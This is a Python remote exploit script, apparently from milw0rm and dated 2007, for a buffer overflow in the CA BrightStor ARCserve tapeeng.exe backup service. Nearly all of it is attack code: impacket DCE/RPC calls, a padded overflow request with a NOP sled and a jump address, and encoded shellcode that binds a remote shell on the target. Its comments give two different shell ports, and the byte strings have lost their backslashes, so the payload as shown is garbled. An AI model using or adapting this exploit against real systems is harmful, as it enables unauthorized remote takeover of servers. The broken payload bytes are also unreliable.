#!/usr/bin/python
# Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve
# tapeeng.exe service. Tested on windows 2000 SP4. Binds shell to TCP port 4443
#
# Winny M Thomas
# Author shall bear no responsibility for any screw ups caused by using this code


from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import sys

def EnableDetailLogging(target):
       trans = transport.TCPTransport(target, 6502)
       #On some linux systems the following call to connect may fail due to
       #no support of settimeout in socket module. Comment out that line in
       #transport.py of impacket and run this script

       try:
               trans.connect()
       except:
               print 'Could not connect to target port; Target may not be running tapeeng'
               sys.exit(-1)

       dce = dcerpc.DCERPC_v5(trans)
       dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))

       #RPC request to enable detail logging
       request = 'x00x04x08x0c'
       request += 'x02x00x00x00'
       request += 'x00x00x00x00'
       request += 'x00x00x00x00'
       request += 'x00x00x00x00'

       dce.call(43, request)

def DCEconnectAndExploit(target):
       trans = transport.TCPTransport(target, 6502)
       trans.connect()
       dce = dcerpc.DCERPC_v5(trans)
       dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))

       request  = 'x10x09xf9x77'
       request += 'x41'*1130
       request += 'x90x90x90x90xebx08' #short jump into nops
       request += 'xd2x7bx57x7c' #call ebx address from kernel32.dll
       request += 'x90' * 32
       #Shellcode to bind shell to TCP port 3334
       request += "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73"
       request += "x13xe9x59x23xcex83xebxfcxe2xf4x15x33xc8x83"
       request += "x01xa0xdcx31x16x39xa8xa2xcdx7dxa8x8bxd5xd2"
       request += "x5fxcbx91x58xccx45xa6x41xa8x91xc9x58xc8x87"
       request += "x62x6dxa8xcfx07x68xe3x57x45xddxe3xbaxeex98"
       request += "xe9xc3xe8x9bxc8x3axd2x0dx07xe6x9cxbcxa8x91"
       request += "xcdx58xc8xa8x62x55x68x45xb6x45x22x25xeax75"
       request += "xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
       request += "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57"
       request += "xcfx9ex16x8fx45x9dx8fx31x10xfcx81x2ex50xfc"
       request += "xb6x0dxdcx1ex81x92xcex32xd2x09xdcx18xb6xd0"
       request += "xc6xa8x68xb4x2bxccxbcx33x21x31x39x31xfaxc7"
       request += "x1cxf4x74x31x3fx0ax70x9dxbax0ax60x9dxaax0a"
       request += "xdcx1ex8fx31x32x95x8fx0axaax2fx7cx31x87xd4"
       request += "x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6x4dxf4"
       request += "x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
       request += "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9f"
       request += "x5ax99x16x8fx76x31x39x3fx49xaax8fx31x40xa3"
       request += "x60xbcx49x9exb0x70xefx47x0ex33x67x47x0bx68"
       request += "xe3x3dx43xa7x61xe3x17x1bx0fx5dx64x23x1bx65"
       request += "x42xf2x4bxbcx17xeax35x31x9cx1dxdcx18xb2x0e"
       request += "x71x9fxb8x08x49xcfxb8x08x76x9fx16x89x4bx63"
       request += "x30x5cxedx9dx16x8fx49x31x16x6exdcx1ex62x0e"
       request += "xdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
       request += "xbaxa6xf5x31x39x59x23xce"

       dce.call(38, request)

if __name__ == '__main__':
       try:
               target = sys.argv[1]
       except IndexError:
               print 'Usage: %s <target ip>n' % sys.argv[0]
               sys.exit(-1)

       EnableDetailLogging(target)
       DCEconnectAndExploit(target)

       print 'Exploit complete; Now telnet to port 4443 on target'

# milw0rm.com [2007-01-05]